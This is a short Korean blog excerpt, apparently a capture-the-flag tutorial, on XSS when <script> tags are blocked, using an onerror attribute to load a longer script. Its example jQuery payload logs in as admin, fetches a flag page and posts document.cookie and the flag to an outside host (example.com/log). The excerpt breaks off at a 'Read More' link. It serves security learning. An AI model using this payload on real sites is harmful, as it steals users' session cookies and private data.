XSS - import .js file

XSS를 할때 <script> 태그가 막혀있고, <img src=@ onerror=script>와 같은 tag 안에 script를 넣어 공격을 해야하는 상황에서 긴 script를 넣어야 할때 유용하게 쓸 수 있습니다. example $.post("/login.php", { 'id': 'admin', }, function( data ) { $.get("/flag.php", function( data ) { $.post("http://example.com/log", { 'cookie': document.cookie, 'flag': data }, function( data ) { console.log(data); }); }); }); javascript 코드안에서 js 파일을 import 하는 [Read More]